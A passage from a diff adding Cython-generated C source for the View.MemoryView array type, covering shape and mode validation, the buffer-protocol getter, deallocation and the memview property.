PyTuple_GET_ITEM(__pyx_t_4, __pyx_t_1); __Pyx_INCREF(__pyx_t_5); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(1, 159, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_4, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 159, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_t_5); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 159, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_dim = __pyx_t_9; + __pyx_v_idx = __pyx_t_7; + __pyx_t_7 = (__pyx_t_7 + 1); + + /* "View.MemoryView":160 + * + * for idx, dim in enumerate(shape): + * if dim <= 0: # <<<<<<<<<<<<<< + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim + */ + __pyx_t_3 = (__pyx_v_dim <= 0); + if (unlikely(__pyx_t_3)) { + + /* "View.MemoryView":161 + * for idx, dim in enumerate(shape): + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." # <<<<<<<<<<<<<< + * self._shape[idx] = dim + * + */ + __pyx_t_5 = PyTuple_New(5); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_9 = 0; + __pyx_t_10 = 127; + __Pyx_INCREF(__pyx_kp_u_Invalid_shape_in_axis); + __pyx_t_9 += 22; + __Pyx_GIVEREF(__pyx_kp_u_Invalid_shape_in_axis); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_Invalid_shape_in_axis); + __pyx_t_6 = __Pyx_PyUnicode_From_int(__pyx_v_idx, 0, ' ', 'd'); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_6); + __pyx_t_6 = 0; + __Pyx_INCREF(__pyx_kp_u_); + __pyx_t_9 += 2; + __Pyx_GIVEREF(__pyx_kp_u_); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u_); + __pyx_t_6 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_6); + __pyx_t_6 = 0; + __Pyx_INCREF(__pyx_kp_u__2); + __pyx_t_9 += 1; + __Pyx_GIVEREF(__pyx_kp_u__2); + PyTuple_SET_ITEM(__pyx_t_5, 4, __pyx_kp_u__2); + __pyx_t_6 = __Pyx_PyUnicode_Join(__pyx_t_5, 5, __pyx_t_9, __pyx_t_10); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_6, 0, 0); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __PYX_ERR(1, 161, __pyx_L1_error) + + /* "View.MemoryView":160 + * + * for idx, dim in enumerate(shape): + * if dim <= 0: # <<<<<<<<<<<<<< + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim + */ + } + + /* "View.MemoryView":162 + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim # <<<<<<<<<<<<<< + * + * cdef char order + */ + (__pyx_v_self->_shape[__pyx_v_idx]) = __pyx_v_dim; + + /* "View.MemoryView":159 + * + * + * for idx, dim in enumerate(shape): # <<<<<<<<<<<<<< + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + */ + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "View.MemoryView":165 + * + * cdef char order + * if mode == 'c': # <<<<<<<<<<<<<< + * order = b'C' + * self.mode = u'c' + */ + __pyx_t_3 = (__Pyx_PyString_Equals(__pyx_v_mode, __pyx_n_s_c, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(1, 165, __pyx_L1_error) + if (__pyx_t_3) { + + /* "View.MemoryView":166 + * cdef char order + * if mode == 'c': + * order = b'C' # <<<<<<<<<<<<<< + * self.mode = u'c' + * elif mode == 'fortran': + */ + __pyx_v_order = 'C'; + + /* "View.MemoryView":167 + * if mode == 'c': + * order = b'C' + * self.mode = u'c' # <<<<<<<<<<<<<< + * elif mode == 'fortran': + * order = b'F' + */ + __Pyx_INCREF(__pyx_n_u_c); + __Pyx_GIVEREF(__pyx_n_u_c); + __Pyx_GOTREF(__pyx_v_self->mode); + __Pyx_DECREF(__pyx_v_self->mode); + __pyx_v_self->mode = __pyx_n_u_c; + + /* "View.MemoryView":165 + * + * cdef char order + * if mode == 'c': # <<<<<<<<<<<<<< + * order = b'C' + * self.mode = u'c' + */ + goto __pyx_L11; + } + + /* "View.MemoryView":168 + * order = b'C' + * self.mode = u'c' + * elif mode == 'fortran': # <<<<<<<<<<<<<< + * order = b'F' + * self.mode = u'fortran' + */ + __pyx_t_3 = (__Pyx_PyString_Equals(__pyx_v_mode, __pyx_n_s_fortran, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(1, 168, __pyx_L1_error) + if (likely(__pyx_t_3)) { + + /* "View.MemoryView":169 + * self.mode = u'c' + * elif mode == 'fortran': + * order = b'F' # <<<<<<<<<<<<<< + * self.mode = u'fortran' + * else: + */ + __pyx_v_order = 'F'; + + /* "View.MemoryView":170 + * elif mode == 'fortran': + * order = b'F' + * self.mode = u'fortran' # <<<<<<<<<<<<<< + * else: + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" + */ + __Pyx_INCREF(__pyx_n_u_fortran); + __Pyx_GIVEREF(__pyx_n_u_fortran); + __Pyx_GOTREF(__pyx_v_self->mode); + __Pyx_DECREF(__pyx_v_self->mode); + __pyx_v_self->mode = __pyx_n_u_fortran; + + /* "View.MemoryView":168 + * order = b'C' + * self.mode = u'c' + * elif mode == 'fortran': # <<<<<<<<<<<<<< + * order = b'F' + * self.mode = u'fortran' + */ + goto __pyx_L11; + } + + /* "View.MemoryView":172 + * self.mode = u'fortran' + * else: + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" # <<<<<<<<<<<<<< + * + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) + */ + /*else*/ { + __pyx_t_4 = __Pyx_PyObject_FormatSimple(__pyx_v_mode, __pyx_empty_unicode); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = __Pyx_PyUnicode_Concat(__pyx_kp_u_Invalid_mode_expected_c_or_fortr, __pyx_t_4); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_6, 0, 0); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __PYX_ERR(1, 172, __pyx_L1_error) + } + __pyx_L11:; + + /* "View.MemoryView":174 + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" + * + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) # <<<<<<<<<<<<<< + * + * self.free_data = allocate_buffer + */ + __pyx_v_self->len = __pyx_fill_contig_strides_array(__pyx_v_self->_shape, __pyx_v_self->_strides, __pyx_v_itemsize, __pyx_v_self->ndim, __pyx_v_order); + + /* "View.MemoryView":176 + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) + * + * self.free_data = allocate_buffer # <<<<<<<<<<<<<< + * self.dtype_is_object = format == b'O' + * + */ + __pyx_v_self->free_data = __pyx_v_allocate_buffer; + + /* "View.MemoryView":177 + * + * self.free_data = allocate_buffer + * self.dtype_is_object = format == b'O' # <<<<<<<<<<<<<< + * + * if allocate_buffer: + */ + __pyx_t_6 = PyObject_RichCompare(__pyx_v_format, __pyx_n_b_O, Py_EQ); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 177, __pyx_L1_error) + __pyx_t_3 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_3 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 177, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_v_self->dtype_is_object = __pyx_t_3; + + /* "View.MemoryView":179 + * self.dtype_is_object = format == b'O' + * + * if allocate_buffer: # <<<<<<<<<<<<<< + * _allocate_buffer(self) + * + */ + if (__pyx_v_allocate_buffer) { + + /* "View.MemoryView":180 + * + * if allocate_buffer: + * _allocate_buffer(self) # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + __pyx_t_7 = __pyx_array_allocate_buffer(__pyx_v_self); if (unlikely(__pyx_t_7 == ((int)-1))) __PYX_ERR(1, 180, __pyx_L1_error) + + /* "View.MemoryView":179 + * self.dtype_is_object = format == b'O' + * + * if allocate_buffer: # <<<<<<<<<<<<<< + * _allocate_buffer(self) + * + */ + } + + /* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.array.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_format); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":182 + * _allocate_buffer(self) + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + */ + +/* Python wrapper */ +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getbuffer__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(((struct __pyx_array_obj *)__pyx_v_self), ((Py_buffer *)__pyx_v_info), ((int)__pyx_v_flags)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(struct __pyx_array_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + int __pyx_v_bufmode; + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + char *__pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + Py_ssize_t *__pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + if (unlikely(__pyx_v_info == NULL)) { + PyErr_SetString(PyExc_BufferError, "PyObject_GetBuffer: view==NULL argument is obsolete"); + return -1; + } + __Pyx_RefNannySetupContext("__getbuffer__", 0); + __pyx_v_info->obj = Py_None; __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(__pyx_v_info->obj); + + /* "View.MemoryView":184 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 # <<<<<<<<<<<<<< + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": + */ + __pyx_v_bufmode = -1; + + /* "View.MemoryView":185 + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): # <<<<<<<<<<<<<< + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + __pyx_t_1 = ((__pyx_v_flags & ((PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS) | PyBUF_ANY_CONTIGUOUS)) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":186 + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": # <<<<<<<<<<<<<< + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + */ + __pyx_t_1 = (__Pyx_PyUnicode_Equals(__pyx_v_self->mode, __pyx_n_u_c, Py_EQ)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 186, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":187 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS # <<<<<<<<<<<<<< + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + __pyx_v_bufmode = (PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS); + + /* "View.MemoryView":186 + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": # <<<<<<<<<<<<<< + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + */ + goto __pyx_L4; + } + + /* "View.MemoryView":188 + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": # <<<<<<<<<<<<<< + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + */ + __pyx_t_1 = (__Pyx_PyUnicode_Equals(__pyx_v_self->mode, __pyx_n_u_fortran, Py_EQ)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 188, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":189 + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS # <<<<<<<<<<<<<< + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." + */ + __pyx_v_bufmode = (PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS); + + /* "View.MemoryView":188 + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": # <<<<<<<<<<<<<< + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + */ + } + __pyx_L4:; + + /* "View.MemoryView":190 + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): # <<<<<<<<<<<<<< + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + */ + __pyx_t_1 = (!((__pyx_v_flags & __pyx_v_bufmode) != 0)); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":191 + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." # <<<<<<<<<<<<<< + * info.buf = self.data + * info.len = self.len + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Can_only_create_a_buffer_that_is, 0, 0); + __PYX_ERR(1, 191, __pyx_L1_error) + + /* "View.MemoryView":190 + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): # <<<<<<<<<<<<<< + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + */ + } + + /* "View.MemoryView":185 + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): # <<<<<<<<<<<<<< + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + } + + /* "View.MemoryView":192 + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data # <<<<<<<<<<<<<< + * info.len = self.len + * + */ + __pyx_t_2 = __pyx_v_self->data; + __pyx_v_info->buf = __pyx_t_2; + + /* "View.MemoryView":193 + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + * info.len = self.len # <<<<<<<<<<<<<< + * + * if flags & PyBUF_STRIDES: + */ + __pyx_t_3 = __pyx_v_self->len; + __pyx_v_info->len = __pyx_t_3; + + /* "View.MemoryView":195 + * info.len = self.len + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.ndim = self.ndim + * info.shape = self._shape + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_STRIDES) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":196 + * + * if flags & PyBUF_STRIDES: + * info.ndim = self.ndim # <<<<<<<<<<<<<< + * info.shape = self._shape + * info.strides = self._strides + */ + __pyx_t_4 = __pyx_v_self->ndim; + __pyx_v_info->ndim = __pyx_t_4; + + /* "View.MemoryView":197 + * if flags & PyBUF_STRIDES: + * info.ndim = self.ndim + * info.shape = self._shape # <<<<<<<<<<<<<< + * info.strides = self._strides + * else: + */ + __pyx_t_5 = __pyx_v_self->_shape; + __pyx_v_info->shape = __pyx_t_5; + + /* "View.MemoryView":198 + * info.ndim = self.ndim + * info.shape = self._shape + * info.strides = self._strides # <<<<<<<<<<<<<< + * else: + * info.ndim = 1 + */ + __pyx_t_5 = __pyx_v_self->_strides; + __pyx_v_info->strides = __pyx_t_5; + + /* "View.MemoryView":195 + * info.len = self.len + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.ndim = self.ndim + * info.shape = self._shape + */ + goto __pyx_L6; + } + + /* "View.MemoryView":200 + * info.strides = self._strides + * else: + * info.ndim = 1 # <<<<<<<<<<<<<< + * info.shape = &self.len if flags & PyBUF_ND else NULL + * info.strides = NULL + */ + /*else*/ { + __pyx_v_info->ndim = 1; + + /* "View.MemoryView":201 + * else: + * info.ndim = 1 + * info.shape = &self.len if flags & PyBUF_ND else NULL # <<<<<<<<<<<<<< + * info.strides = NULL + * + */ + if (((__pyx_v_flags & PyBUF_ND) != 0)) { + __pyx_t_5 = (&__pyx_v_self->len); + } else { + __pyx_t_5 = NULL; + } + __pyx_v_info->shape = __pyx_t_5; + + /* "View.MemoryView":202 + * info.ndim = 1 + * info.shape = &self.len if flags & PyBUF_ND else NULL + * info.strides = NULL # <<<<<<<<<<<<<< + * + * info.suboffsets = NULL + */ + __pyx_v_info->strides = NULL; + } + __pyx_L6:; + + /* "View.MemoryView":204 + * info.strides = NULL + * + * info.suboffsets = NULL # <<<<<<<<<<<<<< + * info.itemsize = self.itemsize + * info.readonly = 0 + */ + __pyx_v_info->suboffsets = NULL; + + /* "View.MemoryView":205 + * + * info.suboffsets = NULL + * info.itemsize = self.itemsize # <<<<<<<<<<<<<< + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL + */ + __pyx_t_3 = __pyx_v_self->itemsize; + __pyx_v_info->itemsize = __pyx_t_3; + + /* "View.MemoryView":206 + * info.suboffsets = NULL + * info.itemsize = self.itemsize + * info.readonly = 0 # <<<<<<<<<<<<<< + * info.format = self.format if flags & PyBUF_FORMAT else NULL + * info.obj = self + */ + __pyx_v_info->readonly = 0; + + /* "View.MemoryView":207 + * info.itemsize = self.itemsize + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL # <<<<<<<<<<<<<< + * info.obj = self + * + */ + if (((__pyx_v_flags & PyBUF_FORMAT) != 0)) { + __pyx_t_2 = __pyx_v_self->format; + } else { + __pyx_t_2 = NULL; + } + __pyx_v_info->format = __pyx_t_2; + + /* "View.MemoryView":208 + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL + * info.obj = self # <<<<<<<<<<<<<< + * + * def __dealloc__(array self): + */ + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); + __pyx_v_info->obj = ((PyObject *)__pyx_v_self); + + /* "View.MemoryView":182 + * _allocate_buffer(self) + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__getbuffer__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + if (__pyx_v_info->obj != NULL) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + goto __pyx_L2; + __pyx_L0:; + if (__pyx_v_info->obj == Py_None) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + __pyx_L2:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":210 + * info.obj = self + * + * def __dealloc__(array self): # <<<<<<<<<<<<<< + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + */ + +/* Python wrapper */ +static void __pyx_array___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_array___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(struct __pyx_array_obj *__pyx_v_self) { + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":211 + * + * def __dealloc__(array self): + * if self.callback_free_data != NULL: # <<<<<<<<<<<<<< + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + */ + __pyx_t_1 = (__pyx_v_self->callback_free_data != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":212 + * def __dealloc__(array self): + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) # <<<<<<<<<<<<<< + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: + */ + __pyx_v_self->callback_free_data(__pyx_v_self->data); + + /* "View.MemoryView":211 + * + * def __dealloc__(array self): + * if self.callback_free_data != NULL: # <<<<<<<<<<<<<< + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":213 + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + */ + if (__pyx_v_self->free_data) { + } else { + __pyx_t_1 = __pyx_v_self->free_data; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_self->data != NULL); + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "View.MemoryView":214 + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":215 + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) # <<<<<<<<<<<<<< + * free(self.data) + * PyObject_Free(self._shape) + */ + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_self->data, __pyx_v_self->_shape, __pyx_v_self->_strides, __pyx_v_self->ndim, 0); + + /* "View.MemoryView":214 + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + */ + } + + /* "View.MemoryView":216 + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) # <<<<<<<<<<<<<< + * PyObject_Free(self._shape) + * + */ + free(__pyx_v_self->data); + + /* "View.MemoryView":213 + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + */ + } + __pyx_L3:; + + /* "View.MemoryView":217 + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + * PyObject_Free(self._shape) # <<<<<<<<<<<<<< + * + * @property + */ + PyObject_Free(__pyx_v_self->_shape); + + /* "View.MemoryView":210 + * info.obj = self + * + * def __dealloc__(array self): # <<<<<<<<<<<<<< + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":219 + * PyObject_Free(self._shape) + * + * @property # <<<<<<<<<<<<<< + * def memview(self): + * return self.get_memview() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_5array_7memview___get__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_5array_7memview___get__(struct __pyx_array_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":221 + * @property + * def memview(self): + * return self.get_memview() # <<<<<<<<<<<<<< + * + * @cname('get_memview') + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((struct __pyx_vtabstruct_array *)__pyx_v_self->__pyx_vtab)->get_memview(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 221, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":219 + * PyObject_Free(self._shape) + * + * @property # <<<<<<<<<<<<<< + * def memview(self): + * return self.get_memview() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.array.memview.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":224 + * + * @cname('get_memview') + * cdef get_memview(self): # <<<<<<<<<<<<<< + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) + */ + +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *__pyx_v_self) { + int 